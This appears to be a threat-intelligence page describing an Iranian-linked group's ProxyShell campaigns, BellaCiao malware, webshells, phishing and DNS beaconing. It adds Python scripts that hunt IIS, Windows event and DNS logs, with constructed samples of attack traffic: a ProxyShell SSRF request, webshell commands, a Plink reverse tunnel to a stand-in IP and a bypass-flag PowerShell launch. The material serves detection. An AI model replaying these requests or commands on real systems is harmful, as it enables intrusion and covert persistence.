Documentation Index
Fetch the complete documentation index at: https://mintlify.com/KittenBusters/CharmingKitten/llms.txt
Use this file to discover all available pages before exploring further.
Exploitation Tactics
ProxyShell Exploitation
Department 40 conducted extensive ProxyShell exploitation campaigns targeting Microsoft Exchange servers worldwide.
Campaign Scale
Documented targeting across multiple countries:
- India: 52+ targets exploited
- Greece: 34+ Exchange servers compromised
- Belgium: 31+ targets attacked
- Canada: Multiple targets identified
- Egypt: Various entities compromised
Exploitation Process
- Target Identification: Scanning for vulnerable Exchange servers
- Vulnerability Exploitation: Using the ProxyShell chain (CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207). The source material also lists CVE-2024-1709, but that is a ConnectWise ScreenConnect authentication bypass disclosed in 2024, not an Exchange flaw, so it cannot have been part of the 2022 Exchange campaign
- Initial Access: Authentication bypass, via the ProxyShell path-confusion bug that lets unauthenticated requests reach back-end Exchange endpoints (Autodiscover, MAPI, the PowerShell backend)
- Webshell Deployment: Installing persistent access mechanisms, typically by writing a webshell into a web-served Exchange directory
- Credential Harvesting: Extracting user credentials and domain information
Target Selection
ProxyShell campaigns targeted:
- Corporate email infrastructure
- Government Exchange servers
- Financial institution mail servers
- Professional services organizations
- Healthcare entities
Webshell Deployment
Multiple webshell variants were employed.
Webshell Types
- ASP Webshells: webshell.asp, m0s.asp, file.asp; custom variants for Exchange OWA paths
- Deployment Locations: /owa/auth/OutlookOU.aspx, /owa/auth/webclient.aspx; custom Exchange authentication paths
- Capabilities:
  - File upload and download
  - Command execution
  - Credential harvesting
  - Network reconnaissance
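A detection counterpart to the Exploitation Process and Webshell Deployment passages above, added here as an example and not tooling from the leaked material: it parses Exchange IIS logs in W3C format, flags the CVE-2021-34473 Autodiscover request shape (the "@host" query prefix with autodiscover.json re-embedded in the Email parameter, or a later X-Rps-CAT hit on the PowerShell backend), and flags requests to the webshell paths and ASP file names listed on this page. The sample log is constructed; the "owa_auth_post_heuristic" rule is an assumption about normal OWA traffic, not something the page states.

```python
"""Hunt Exchange IIS (W3C) logs for ProxyShell exploitation and webshell hits.

Added example, not tooling from the page: the sample log is constructed and the
webshell paths/names come from the page's "Webshell Deployment" section.
"""
import re
from dataclasses import dataclass
from urllib.parse import unquote

# Deployment locations and ASP file names listed on the page (lower-cased for matching).
WEBSHELL_PATHS = {"/owa/auth/outlookou.aspx", "/owa/auth/webclient.aspx"}
WEBSHELL_NAMES = {"webshell.asp", "m0s.asp", "file.asp"}

# CVE-2021-34473 (ProxyShell pre-auth path confusion): the Autodiscover URL is requested
# with an "@host" prefix in the query and autodiscover.json re-embedded in the Email
# parameter; later stages reach the PowerShell backend with an X-Rps-CAT token.
AUTODISCOVER_RE = re.compile(r"autodiscover/autodiscover\.json", re.I)
EMAIL_TRICK_RE = re.compile(r"email=autodiscover/autodiscover\.json", re.I)


@dataclass
class Hit:
    line_no: int
    client_ip: str
    rule: str
    uri: str


def parse_w3c(text):
    """Yield (line_no, {field: value}) records, taking column names from the #Fields header."""
    fields = None
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line.split()[1:]
            continue
        if fields is None:
            raise ValueError("log has no #Fields header")
        values = line.split()
        if len(values) != len(fields):
            continue  # skip malformed/truncated lines rather than mis-assign columns
        yield n, dict(zip(fields, values))


def hunt(text):
    hits = []
    for n, rec in parse_w3c(text):
        raw_stem = rec.get("cs-uri-stem", "")
        stem = raw_stem.lower()
        query = unquote(rec.get("cs-uri-query", "-"))
        uri = raw_stem if query == "-" else f"{raw_stem}?{query}"
        name = stem.rsplit("/", 1)[-1]
        ip = rec.get("c-ip", "?")
        if AUTODISCOVER_RE.search(stem) and (
            ("@" in query and EMAIL_TRICK_RE.search(query)) or "x-rps-cat=" in query.lower()
        ):
            hits.append(Hit(n, ip, "proxyshell_ssrf", uri))
        elif stem in WEBSHELL_PATHS or name in WEBSHELL_NAMES:
            hits.append(Hit(n, ip, "webshell_path", uri))
        elif (stem.startswith("/owa/auth/") and stem.endswith(".aspx")
              and rec.get("cs-method") == "POST" and name != "logon.aspx"):
            # Heuristic (assumption): POSTs to OWA auth pages other than logon.aspx are unusual.
            hits.append(Hit(n, ip, "owa_auth_post_heuristic", uri))
    return hits


def by_source(hits):
    """Map client IP -> set of rules it triggered, to spot one host chaining SSRF then webshell use."""
    out = {}
    for h in hits:
        out.setdefault(h.client_ip, set()).add(h.rule)
    return out


# Constructed sample: one benign OWA logon, then an SSRF probe followed by webshell access
# from the same source, then another benign logon.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2022-05-14 03:12:07 10.0.0.5 GET /owa/auth/logon.aspx url=/owa/ 443 - 198.51.100.20 Mozilla/5.0 200
2022-05-14 03:12:41 10.0.0.5 POST /autodiscover/autodiscover.json @evil.example/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@evil.example 443 - 203.0.113.9 python-requests/2.27.1 200
2022-05-14 03:13:02 10.0.0.5 POST /owa/auth/OutlookOU.aspx - 443 - 203.0.113.9 python-requests/2.27.1 200
2022-05-14 03:13:09 10.0.0.5 GET /owa/auth/webclient.aspx cmd=whoami 443 - 203.0.113.9 python-requests/2.27.1 200
2022-05-14 03:14:30 10.0.0.5 POST /owa/auth/logon.aspx - 443 - 198.51.100.20 Mozilla/5.0 302
"""

if __name__ == "__main__":
    for h in hunt(SAMPLE_LOG):
        print(f"line {h.line_no} {h.client_ip} {h.rule} {h.uri}")
```

On a real server the logs live under inetpub\logs\LogFiles and the Exchange HttpProxy logs add the back-end target, which confirms the SSRF; the same rule set applies to both.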
Python Framework
Custom Python-based webshell management framework:
- Command Interface: Python scripts for attacker-side command management
- Remote Execution: RCE capabilities (rce5.py, RCE4.py)
- Connection Management: connect.py for session handling
- Centralized Control: Framework for managing multiple compromised hosts
BellaCiao Malware
Department 40 developed and deployed the BellaCiao malware family, publicly analyzed by Bitdefender.
Variant 1: C# Webshell Dropper
Technical Details:
- .NET-based dropper service
- Disguised as legitimate Windows services:
  - “Exchange Agent Diagnostic Services”
  - “Microsoft Monitoring Exchange Services”
  - “Microsoft Agent Services”
  - “WinUpdateService”
- Drops a C# webshell on target systems
- File upload functionality
- File download capabilities
- Command execution interface
- Persistence through service installation
- Turkish Foreign Ministry attack documented
- Multiple webshell deployments
- Sustained access operations
Variant 2: PowerShell Reverse Proxy
Technical Details:
- PowerShell-based implementation
- Uses Plink (the PuTTY command-line SSH client) to build the reverse proxy as an SSH reverse tunnel
- Customized PowerShell webserver based on publicly available code
- Reference: modified version of Start-Webserver.ps1 from the venom framework
- iis.ps1: PowerShell webserver script
- iis.txt: Configuration and logs
- Plink integration for tunneling
- Reverse proxy establishment
- Network tunneling
- Command and control communications
- Bypassing network restrictions
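A hunting script for both BellaCiao variants, added as an example rather than anything from the leaked material: it walks Windows event records shaped like System event 7045 (service installed) and Sysmon event 1 (process creation), flags the four dropper service names listed above, flags Microsoft- or Exchange-named services whose binary sits outside the expected install directories (a heuristic and an assumption, not a page claim), and catches Plink started with a reverse-tunnel (-R) argument, IIS worker processes spawning a shell, and PowerShell launching iis.ps1. The events are constructed dicts, as you would get from Get-WinEvent piped to ConvertTo-Json.

```python
"""Hunt Windows event records for BellaCiao-style persistence and Plink reverse tunnels.

Added example, not the page's or the malware author's code. Records are plain dicts
shaped like System 7045 and Sysmon 1 events; the samples below are constructed.
"""
import re
from pathlib import PureWindowsPath

# Service names the page lists for the variant-1 dropper service.
BELLACIAO_SERVICE_NAMES = {
    "exchange agent diagnostic services",
    "microsoft monitoring exchange services",
    "microsoft agent services",
    "winupdateservice",
}
# Assumption/heuristic: a genuine Microsoft or Exchange service binary lives under one of these.
TRUSTED_SERVICE_DIRS = ("c:\\windows\\", "c:\\program files\\microsoft\\exchange server\\")
# plink -R [listen-ip:]port:host:port opens a reverse tunnel; -N suppresses the remote shell.
PLINK_REVERSE_RE = re.compile(r"(^|\s)-R\s+\S+:\d+")
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def _exe(path):
    return PureWindowsPath(path.strip('"')).name.lower()


def check_service_install(ev):
    """Rules for a 7045 record; returns a rule name or None."""
    name = ev.get("ServiceName", "").strip().lower()
    image = ev.get("ImagePath", "").strip().lstrip('"').lower()
    if name in BELLACIAO_SERVICE_NAMES:
        return "bellaciao_service_name"
    looks_microsoft = "exchange" in name or name.startswith("microsoft")
    if looks_microsoft and not image.startswith(TRUSTED_SERVICE_DIRS):
        return "microsoft_named_service_outside_trusted_dir"
    return None


def check_process(ev):
    """Rules for a Sysmon process-creation record; returns a rule name or None."""
    image = _exe(ev.get("Image", ""))
    parent = _exe(ev.get("ParentImage", ""))
    cmdline = ev.get("CommandLine", "")
    if image == "plink.exe" and PLINK_REVERSE_RE.search(cmdline):
        return "plink_reverse_tunnel"
    if parent == "w3wp.exe" and image in SHELLS:
        return "iis_worker_spawned_shell"  # a webshell running commands under IIS
    if image in SHELLS and re.search(r"iis\.ps1|start-webserver", cmdline, re.I):
        return "powershell_webserver_script"
    return None


def hunt(events):
    """Return (computer, rule, detail) tuples for every record that trips a rule."""
    findings = []
    for ev in events:
        if ev.get("EventID") == 7045:
            rule, detail = check_service_install(ev), ev.get("ServiceName")
        elif ev.get("EventID") == 1:
            rule, detail = check_process(ev), ev.get("CommandLine")
        else:
            rule, detail = None, None
        if rule:
            findings.append((ev.get("Computer", "?"), rule, detail))
    return findings


# Constructed sample records: two malicious service installs, one legitimate Exchange service,
# a webshell child process, a Plink reverse tunnel, the PowerShell webserver, and noise.
SAMPLE_EVENTS = [
    {"EventID": 7045, "Computer": "EXCH01", "ServiceName": "Exchange Agent Diagnostic Services",
     "ImagePath": "C:\\ProgramData\\Microsoft\\Exchange\\ExchangeAgentDiagnostic.exe"},
    {"EventID": 7045, "Computer": "EXCH01", "ServiceName": "Microsoft Exchange Transport",
     "ImagePath": "\"C:\\Program Files\\Microsoft\\Exchange Server\\V15\\Bin\\MSExchangeTransport.exe\""},
    {"EventID": 7045, "Computer": "EXCH01", "ServiceName": "Microsoft Telemetry Host",
     "ImagePath": "C:\\Users\\Public\\tlmhost.exe"},
    {"EventID": 1, "Computer": "EXCH01", "Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\Windows\\System32\\inetsrv\\w3wp.exe", "CommandLine": "cmd.exe /c whoami"},
    {"EventID": 1, "Computer": "EXCH01", "Image": "C:\\Users\\Public\\plink.exe",
     "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "plink.exe -N -batch -pw secret -R 8080:127.0.0.1:80 tunnel@203.0.113.9"},
    {"EventID": 1, "Computer": "EXCH01", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\System32\\services.exe",
     "CommandLine": "powershell.exe -ep bypass -File C:\\ProgramData\\iis.ps1"},
    {"EventID": 1, "Computer": "EXCH01", "Image": "C:\\Windows\\System32\\notepad.exe",
     "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for computer, rule, detail in hunt(SAMPLE_EVENTS):
        print(computer, rule, detail)
```

The 7045 rule on its own is a lookup; the value is in pairing it with the ImagePath check, since a renamed dropper still has to install from somewhere writable, and with the w3wp.exe parent check, which catches the dropped webshell regardless of its file name.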
TAGHEB System
Internal documents reference the “TAGHEB system” for Windows infection and access:
- Designed for Windows operating system targeting
- Access and persistence mechanisms
- Details contained in leaked operational documents
Social Engineering Operations
AMEEN ALKHALIJ Recruitment Campaign
Sophisticated social engineering operation targeting UAE security personnel.
Campaign Design
Target Audience: Former government and security employees from the United Arab Emirates
Operational Method:
- Established fake recruitment website: ameen-alkhalij.nu
- Posed as legitimate employment opportunity
- Collected credentials and personal information
- Gathered intelligence on UAE security personnel
Infrastructure
Server Logs Available: Complete access logs from the ameen-alkhalij.nu server showing:
- Visitor IP addresses
- Access timestamps
- User agent information
- Attack reconnaissance activities
Objectives
- Credential Harvesting: Collecting login credentials from targets
- Intelligence Gathering: Profiling former UAE security personnel
- Network Mapping: Identifying connections and relationships
- Operational Preparation: Building target database for future operations
Technical Capabilities
Credential Harvesting
Multiple methods employed:
- Webshell Access: Extracting credentials from compromised systems
- Phishing Operations: Social engineering for credential collection
- Domain Enumeration: Active Directory user discovery
- Password Extraction: From memory and stored credentials
DNS Beaconing
Command and control communications via DNS:
- Covert C2 channel establishment
- Data exfiltration through DNS queries
- Avoiding traditional network monitoring
- Maintaining persistent communications
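DNS beaconing and DNS exfiltration leave a statistical footprint even when the traffic is never blocked: one apex domain receives many never-repeated, high-entropy subdomains (the data rides in the query name), the queries arrive at a near-constant interval (the beacon timer), and the record types chosen leave room for data in the answer. The script below, added as an example and not derived from the leaked material, scores a constructed DNS query log on those three signals; the c2-example.net domain, the thresholds and the "last two labels are the apex" simplification are all assumptions.

```python
"""Score DNS query logs for tunnelling and beaconing behaviour.

Added example, not tooling from the page. Input lines are constructed in the
form "<epoch> <client_ip> <qname> <qtype>"; the C2 domain is invented.
"""
import math
from collections import defaultdict
from statistics import mean, pstdev


def shannon_entropy(s):
    """Bits per character; random-looking encoded labels score near log2(alphabet size)."""
    if not s:
        return 0.0
    n = len(s)
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname):
    """Return (subdomain, apex). Assumption: apex = last two labels, which is wrong for
    suffixes like co.uk; a production tool would consult the public suffix list."""
    labels = qname.rstrip(".").lower().split(".")
    if len(labels) <= 2:
        return "", ".".join(labels)
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def parse(text):
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        ts, client, qname, qtype = parts
        yield float(ts), client, qname, qtype.upper()


def profile(text):
    """Per-apex statistics: query count, unique subdomains, mean label entropy, and the
    coefficient of variation of inter-query gaps (0.0 means a perfectly regular timer)."""
    acc = defaultdict(lambda: {"ts": [], "subs": set(), "ent": [], "types": set()})
    for ts, _client, qname, qtype in parse(text):
        sub, apex = split_name(qname)
        a = acc[apex]
        a["ts"].append(ts)
        a["subs"].add(sub)
        a["ent"].append(shannon_entropy(sub.replace(".", "")))
        a["types"].add(qtype)
    stats = {}
    for apex, a in acc.items():
        ts = sorted(a["ts"])
        gaps = [b - x for x, b in zip(ts, ts[1:])]
        cv = pstdev(gaps) / mean(gaps) if len(gaps) >= 3 and mean(gaps) > 0 else None
        stats[apex] = {
            "queries": len(ts),
            "unique_subdomains": len(a["subs"]),
            "mean_entropy": mean(a["ent"]),
            "gap_cv": cv,
            "qtypes": sorted(a["types"]),
        }
    return stats


def classify(stats, min_queries=5, entropy_threshold=3.0, cv_threshold=0.2):
    """Map apex -> list of reasons; apexes with no reason are omitted. Thresholds are assumptions."""
    verdicts = {}
    for apex, s in stats.items():
        if s["queries"] < min_queries:
            continue
        reasons = []
        if s["unique_subdomains"] >= 0.8 * s["queries"] and s["mean_entropy"] >= entropy_threshold:
            reasons.append("many unique high-entropy subdomains (data carried in queries)")
        if s["gap_cv"] is not None and s["gap_cv"] <= cv_threshold:
            reasons.append("near-constant query interval (beacon timing)")
        if reasons and set(s["qtypes"]) & {"TXT", "NULL"}:
            reasons.append("record types with room for response data (TXT/NULL)")
        if reasons:
            verdicts[apex] = reasons
    return verdicts


# Constructed sample: a 60-second TXT beacon to c2-example.net with a fresh 16-character
# label each time, interleaved with ordinary lookups for example.com and example.org.
SAMPLE_LOG = """1652500000 10.0.0.21 3f9ak2pq7zx8mw1e.c2-example.net TXT
1652500005 10.0.0.21 www.example.com A
1652500017 10.0.0.21 www.example.com A
1652500060 10.0.0.21 q8z2mv5ktj7c4pxw.c2-example.net TXT
1652500090 10.0.0.21 mail.example.com A
1652500091 10.0.0.21 www.example.com AAAA
1652500120 10.0.0.21 e5tn9x1rbk3wqz7a.c2-example.net TXT
1652500180 10.0.0.21 y4hd7s2fkq9mxc1p.c2-example.net TXT
1652500240 10.0.0.21 r2k7wa5zqt9xe4nf.c2-example.net TXT
1652500300 10.0.0.21 m6c1xp8kd3zq7tvs.c2-example.net TXT
1652500300 10.0.0.21 autodiscover.example.com A
1652500310 10.0.0.21 mail.example.com A
1652500360 10.0.0.21 z9tq4ek2yw7bm5xr.c2-example.net TXT
1652500400 10.0.0.21 updates.example.org A
1652500420 10.0.0.21 k3fw8qz5xa2mp9de.c2-example.net TXT
1652500700 10.0.0.21 updates.example.org A
"""

if __name__ == "__main__":
    for apex, reasons in classify(profile(SAMPLE_LOG)).items():
        print(apex, "->", "; ".join(reasons))
```

Real beacons add jitter, so treat the interval rule as one signal among several and lower cv_threshold only with a larger window; the entropy rule is the robust one, because encoded data cannot avoid looking random.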
Network Reconnaissance
Systematic intelligence gathering:
- Active Directory enumeration
- Network mapping and topology discovery
- User and group identification
- Service and application discovery
- Credential and privilege mapping
Operational Security
Anti-Detection Measures
Documented testing against security products:
- Antivirus Testing: Malware tools tested against:
  - Microsoft Defender
  - Kaspersky
  - Avira
  - ESET
  - Other major AV products
- Stealth Operations: Focus on avoiding detection during operations
Infrastructure Security
Procurement Methods:
- Multiple procurement identities for server purchases
- Use of front companies
- Compartmentalized infrastructure
- Operational servers separated by function:
  - Attack servers
  - Tunnel servers
  - File storage servers
  - C2 infrastructure
- Documented credentials for server access
- Internal communication platforms (ISABELLE, 3CX, SIGNAL)
- File extraction systems
- Centralized infrastructure management
Attack Lifecycle
Initial Access
- Vulnerability Exploitation: ProxyShell (the 2021 Exchange chain) and other CVEs; the source material also lists CVE-2024-1709, which affects ConnectWise ScreenConnect rather than Exchange
- Social Engineering: Phishing and fake recruitment sites
- Credential Compromise: Harvested credentials for initial entry
Persistence
- Webshell Deployment: Multiple ASP and custom webshells
- Service Installation: BellaCiao dropper services
- Backdoor Placement: Multiple access methods maintained
- Credential Collection: For future access
Privilege Escalation
- Domain Enumeration: Identifying privileged accounts
- Credential Harvesting: Administrator and service account credentials
- Lateral Movement Preparation: Mapping privilege paths
Collection and Exfiltration
- File Access: Via webshells and backdoors
- Email Access: Through compromised Exchange servers
- Credential Databases: User and system credentials
- Intelligence Gathering: Documents and communications
- DNS Exfiltration: Covert data extraction
Documented Attack Examples
Turkish Foreign Ministry
- Method: BellaCiao malware deployment
- Access: Sustained webshell access
- Duration: Extended operation documented
- Objective: Government intelligence collection
Mass ProxyShell Campaign
- Timeline: May-June 2022
- Scale: 200+ targets across multiple countries
- Method: Automated exploitation and webshell deployment
- Success Rate: Documented successful compromises in logs
UAE Security Personnel
- Operation: AMEEN ALKHALIJ social engineering
- Target: Former government and security employees
- Method: Fake recruitment website
- Duration: Extended campaign with detailed logging
Training and Development
Leaked documents reveal:
- Training Programs: Internal training materials
- Technical Documentation: Espionage techniques and tools
- Malware Development: Source code and testing procedures
- Intelligence Reports: Analysis of Israeli entities and other targets
- Operational Guides: Including “The Group’s Phishing Guide”
Tools and Frameworks
Custom Malware
- BellaCiao (both variants with source code)
- CYCLOPS (referenced in public reporting)
- Custom webshells (ASP variants)
- Python command framework
- PowerShell scripts
Third-Party Tools
- Plink (PuTTY suite) for tunneling
- Modified open-source tools
- Standard penetration testing utilities
Infrastructure
- Comprehensive server inventory
- Attack infrastructure
- Tunnel servers
- Storage servers
- Internal communication platforms